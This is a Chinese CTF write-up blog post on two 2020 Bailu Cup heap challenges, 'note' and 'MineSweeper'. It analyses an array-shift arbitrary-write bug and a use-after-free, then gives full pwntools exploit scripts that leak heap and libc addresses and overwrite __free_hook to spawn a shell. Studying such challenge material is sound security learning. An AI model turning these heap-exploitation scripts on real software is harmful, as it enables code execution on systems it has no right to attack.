2020柏鹭杯

字数统计: 1.6k字   |   阅读时长≈ 7分

2020柏鹭杯,只有线上赛。

note

程序分析

image-20201004094435394

程序总体功能是一个经典的菜单题,不过有两种类型的note可以创建和修改。其中创建和修改都没问题。

image-20201004094625843

EditNote1 可以修改chunk_list 中的 chunk的值,并且输出修改后的值。

image-20201004094819874

EditNote2 是先修改 chunk_list 中的chunk 数据中存储的地址,再修改 +8 位后的值。

image-20201004094928756

而在Delete 函数中,则存在漏洞。功能逻辑是先使用随机数生成 一个 idx1和 idx2,删除 chunk_list2[idx2] 的值,将其填充为 chunk_list1[idx1]的值,再将 chunk_list1 从 idx1 处 将数组的值依次往前填充一个。由于 chunk_list1 和 chunk_list2 在内存中地址是连续的,当我们 创建了 0x20 个 chunk1 时,chunk_list1 最后往前填充时,会将 chunk_list2[0] 的值填充到 chunk_list1[19] 处。

而结合上面对Edit 函数的分析,可以发现 EditNote1 可以修改chunk的数据,EditNote2 会先将前8位作为地址并修改其指向的数据。我们结合这两种修改 可以对 chunk_list2[0] 的位置实现任意地址修改。

利用分析

程序开启了常见的所有保护:

  1. 泄露heap地址

首先用 0x20 个 chunk 填充 chunk_list1,然后再申请两个 chunk_list2,最后free掉,让 chunk_list1[19] = chunk_list2[0]。然后覆盖 chunk_list1[19] 的低地址,再输出,得到 heap 地址。

  1. 泄露 libc 地址

可以先利用 任意地址写漏洞,将 chunk_list2 的 chunk0 的 size 放大,然后释放 chunk_list2的 chunk0,使其放入 unsortedbin 中,再利用 Editnote1 覆盖低地址,输出后得到 libc 地址。

  1. getshell

最后利用任意地址写漏洞 将 malloc_hook 的 值修改为 gadget 值,最后getshell。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p = process('./note')
    elf = ELF('./note')
    libc = ELF('./libc.so.1')
else:
    libc = ELF('./libc.so')

def New1(content):
    p.recvuntil('>>')
    p.sendline('1')
    p.recvuntil('message: ') 
    p.sendline(content)

def New2(content1, content2):
    p.recvuntil('>>')
    p.sendline('2')
    p.recvuntil('message1: ')
    p.sendline(content1)
    p.recvuntil('message2: ')
    p.sendline(content2)

def Edit1(idx, content):
    p.recvuntil('>>')
    p.sendline('3')
    p.recvuntil('index: ')
    p.sendline(str(idx))
    p.recvuntil('message: ')
    p.send(content)

def Edit2(idx, content1, content2):
    p.recvuntil('>>')
    p.sendline('4')
    p.recvuntil('index: ')
    p.sendline(str(idx))
    p.recvuntil('message1: ')
    p.sendline(content1)
    p.recvuntil('message2: ')
    p.send(content2)

def Delete():
    p.recvuntil('>>')
    p.sendline('5')

def pwn():
    New2('b', 'c')
    for i in range(0x20):
        New1('a')

    for i in range(0x20):
        Delete()

    #gdb.attach(p)
    New1('a')
    Edit1(0x1, 'a')
    p.recvuntil('new message: ')
    heap_addr = u64(p.recv(10)[:6].ljust(8, '\x00'))
    heap_base = heap_addr & 0xfffffffffffff000
    print 'heap_addr:',hex(heap_addr)
    print 'heap_base:',hex(heap_base)
	#Edit chunk_0 size
    fake_chunk = heap_base + 0x250
    Edit1(0x1, p64(fake_chunk+0x8))
    Edit2(0, p64(0x451), 'aaaaaaaa')
    Edit1(0x1, p64(fake_chunk+0x10))
    Delete()
    Edit1(0x2, 'a'*8)

    p.recvuntil('a'*8)
    libc_addr = u64(p.recv(8)[:6].ljust(8, '\x00'))
    libc_base = libc_addr - 0x3ebca0
    print 'libc_base:',hex(libc_base)
    free_hook = libc_base + libc.sym['__free_hook']
    print 'malloc_hook:',hex(free_hook)
    gadget = 0x0 + libc_base
    system_addr = libc_base + libc.sym['system']
    print 'gadget:',hex(gadget)
    print 'system:',hex(system_addr)
    Edit1(0x3, p64(free_hook))
    Edit2(0, p64(system_addr), 'b')
    gdb.attach(p)
    Edit1(0x3, p64(heap_base+0x6b0))
    Edit2(0, '/bin/sh\x00', 'a')
    New1('a')
    Delete()
    p.interactive()

pwn()

MineSweeper

程序分析

image-20201012200630810

程序总体功能实现了一个扫雷游戏,按 A 游戏继续,按 B 删除邮悉,会释放堆块 但释放后未重置指针,存在漏洞;按 C 目前看没太多作用。 按 D 可以扫雷和插旗,格式 DXY0其中 X 表示行数,Y 表示列数, 0表示扫雷。 DXY1,其中 1 表示 插旗子。

image-20201012202804673

在程序一开始,按 2可以 reportbug,会申请一个 size的堆块,并修改内容,再释放。

image-20201012202935394

此外,当游戏获胜后,会在 data 的 第 5 个变量 记录 name。而且 name 这个堆块地址在 删除游戏后并没有被释放。

程序存在一个总体的结构体,我命名为 Mine_data,大小为 0x40。

1
2
3
4
5
6
7
8
struct Mine_data{
	index;		#
	used_flag;
	opeart_record;
    win_flag;	#win game flag
	random_map;	#random map
	name_ptr;		#name_chunk_ptr
}

利用分析

  1. 修改 name堆块指针实现 任意地址写

如果我们先 进入了游戏,则会创建 一个堆块 0x50Mine_data,随后我们选择 B 删除游戏,则该堆块会被释放。然后我们马上选择 reportbug 申请一个 0x50大小的chunk,那么就会申请到 Mine_data 的位置,我们将其 前四个变量都覆盖为 0x61,然后再修改 name_ptr 的指针的后两位地址。随后再随便扫一个雷,由于我们将前面的 win_flag都已覆盖为非0,所以会直接赢得比赛,然后我们可以向我们修改后的 name_ptr指向的地址输入数据。

  1. 利用任意地址写,实现chunk_overlap

我们利用第一步中的 任意地址写,修改一个 mine_map中一个chunksize 大于 原本的size,然后在选择 A重新开始游戏,并在 reportbug时 申请大堆块,就可以让之前的 释放的fastbin中的chunk 被合并。我们再申请 chunk 就能够实现堆覆盖,然后我们再利用堆覆盖来泄露地址。

  1. 泄露地址

在 程序中每次都会输出 扫雷地图,该地图每一行 都是存储在 一个堆块上,我们利用将之前合并的堆块放到 Unsortedbin中,然后 将 main_arena+88 的地址 放到 地图堆块中,那么后面打印输出时,就可以泄露 libc 地址。

  1. getshell

获得 libc地址后,就可以利用任意地址写,将 free_hook 的地址修改为 system地址,再释放一个 含有 /bin/sh\x00 的堆块就可以 getshell 了。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p = process('./MineSweeper')
    elf = ELF('./MineSweeper')
    libc = ELF('./libc.so.6')

def initGame():
    p.recvuntil('$ ')
    p.sendline('1')
    for i in range(3):
        p.recvuntil("----------------------\n")

def reportBug(size, payload):
    p.recvuntil('$ ')
    p.sendline('2')
    p.recvuntil('BugReport: ')
    p.sendline(str(size))
    p.sendline(payload)

def pwn():
    #free Mine_data
    initGame()
    p.sendline('B')
    reportBug(0x38,'a'*0x28+'\xe8')#win flag != 0
    initGame()

    p.sendline("C0")#in case 0x202010
    p.sendline("D001")
    p.recvuntil("New Record! Your name: ")
    p.sendline(p64(0xa1))
    p.sendline("A")#again
    #malloc consolidate
    reportBug(0x500)
    #leak heap
    reportBug(0xe0,'a'*0xa0+'\x51')
    p.recvuntil('$ ')
    p.sendline('1')
    p.recvn(0x43)
    heap_low = u8(p.recvn(1)) & 0xf0
    target = (heap_low << 8) + 0xa0
    print hex(target)
    p.sendline("A")
    #p.recvuntil("")
    #leak libc
    libc_addr = ""

    for i in range(6):
        reportBug(0xe0,'a'*0xa0+p16(target+i))
        p.recvuntil('$ ')
        p.sendline('1')
        p.recvn(0x43)
        libc_addr += p.recvn(1)
        p.sendline("A")

    libc_base = u64(libc_addr.ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 88 - 0x10
    log.success("libc base => " + hex(libc_base))
    libc.address = libc_base
    #get shell

    reportBug(0x38,'a'*0x28+p64(libc.sym['__free_hook']))
    initGame()
    p.sendline("C0")
    sleep(0.02)
    p.sendline("D110")

    p.recvuntil("New Record! Your name: ")
    p.sendline(p64(libc.sym['system']))
    p.sendline("A")#again
    #gdb.attach(p,'b* 0x0000555555554000+0xbd5')
    reportBug(0x30,"/bin/sh\x00")
    p.interactive()

pwn()

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing